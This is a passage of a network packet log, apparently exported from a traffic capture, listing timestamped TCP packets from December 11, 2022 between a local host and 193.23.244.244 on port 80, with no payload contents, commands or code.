                          Dec 11, 2022 09:26:40.808960915 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809001923 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809005022 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809043884 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809088945 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809088945 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809132099 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809175014 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809178114 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809216976 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809258938 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809262991 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809299946 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809340954 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809344053 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809381962 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809423923 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809427977 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809464931 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809505939 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809521914 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809546947 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809588909 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809591055 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809629917 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809670925 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809679031 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809712887 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809755087 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809796095 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809828043 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809837103 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809870005 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809878111 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809921026 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.809957981 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.809962988 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.810004950 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.810080051 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.810229063 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.838627100 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.838690996 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.838768959 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.838814020 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.838836908 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.838893890 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.838947058 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.838994980 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.838999987 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839065075 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839106083 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839111090 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839149952 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839193106 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839198112 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839263916 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839306116 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839310884 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839349031 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839390039 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839400053 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839432001 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839471102 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839473009 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839519978 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839564085 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839586020 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839628935 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839672089 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839719057 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839766979 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839808941 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839812994 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839852095 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839916945 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.839921951 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.839965105 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840006113 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840007067 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840048075 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840094090 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840131998 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840176105 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840215921 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840217113 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840329885 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840373039 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840440989 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840482950 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840521097 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840523958 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840565920 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840610027 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840639114 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840677977 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840714931 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840718985 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840760946 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840800047 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840801954 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840842009 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840879917 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.840882063 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840923071 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840964079 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.840966940 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841003895 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841046095 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841046095 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841085911 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841125011 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841129065 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841169119 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841209888 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841211081 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841250896 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841293097 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841293097 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841332912 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841370106 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841373920 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841414928 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841454983 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841458082 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841495991 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841536045 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841538906 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841577053 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841619015 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841619968 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841660023 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841718912 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841718912 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841761112 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841799974 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841804028 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841845989 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841882944 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.841886997 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841928005 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.841986895 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.842210054 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.870486021 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.870564938 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.870608091 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.870647907 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.870672941 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.870717049 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.870721102 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.870760918 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.870800972 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.870806932 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.870841980 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.870902061 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871046066 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871088982 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871174097 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871181965 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871222973 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871264935 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871294975 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871335983 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871378899 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871393919 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871419907 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871468067 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871517897 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871561050 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871602058 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871611118 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871644020 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871685982 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871694088 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871769905 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871812105 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871819973 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871853113 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871893883 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.871901989 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.871985912 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872045040 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872054100 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872127056 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872172117 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872184038 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872212887 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872265100 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872301102 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872344017 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872384071 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872405052 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872423887 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872464895 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872472048 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872560024 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872600079 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872641087 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872651100 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872680902 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872714043 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872754097 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872796059 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872806072 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872838020 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872898102 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872939110 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.872957945 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.872981071 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873022079 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873024940 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873061895 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873095989 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873102903 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873147964 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873151064 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873189926 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873231888 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873243093 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873271942 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873312950 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873353004 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873369932 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873393059 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873428106 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873433113 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873473883 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873492956 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873513937 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873555899 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873595953 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873605013 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873636961 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873662949 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873677969 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873718023 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873723984 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873759031 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873800039 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873826027 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873847961 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873895884 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.873902082 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.873945951 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.875170946 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.875216961 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.877295017 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.899101019 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.899180889 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.899295092 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.902105093 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902254105 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902297020 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902374029 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902416945 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902457952 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902457952 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.902498960 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902508974 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.902540922 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902582884 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.902591944 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.905807018 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.905960083 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906074047 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.906116009 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906169891 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.906191111 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906361103 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906502962 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906562090 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.906615019 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906661987 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.906682968 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906749964 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906812906 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906857967 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.906902075 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.906972885 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.907004118 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907074928 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907147884 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907215118 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907280922 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907294989 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.907350063 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907414913 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907460928 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.907480955 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907526970 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.907552958 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907618999 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907691002 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907737017 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.907757044 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907804012 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.907823086 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907888889 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907953978 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.907999039 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.908020020 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908067942 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.908090115 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908158064 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908215046 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.908232927 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908303976 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908370972 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908426046 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.908467054 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908519983 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.908540010 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908603907 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908669949 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908754110 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908798933 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.908826113 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908833027 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.908895969 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.908943892 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.908961058 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909025908 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909090042 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909136057 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.909157991 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909203053 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.909225941 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909296036 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909372091 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909423113 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.909440041 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909482956 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.909507036 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909571886 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909629107 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.909638882 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909703016 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909758091 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.909769058 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909836054 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909909010 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.909975052 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.909976006 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.910027027 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.910043955 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.910111904 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.916225910 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.927587986 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.927663088 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.927726984 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.930845976 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.930977106 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.931022882 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.931066036 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.931071997 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.931107998 CET8049738193.23.244.244192.168.2.3
                          Dec 11, 2022 09:26:40.931119919 CET4973880192.168.2.3193.23.244.244
                          Dec 11, 2022 09:26:40.931154013 CET8049738193.23.244.244192.168.2.3
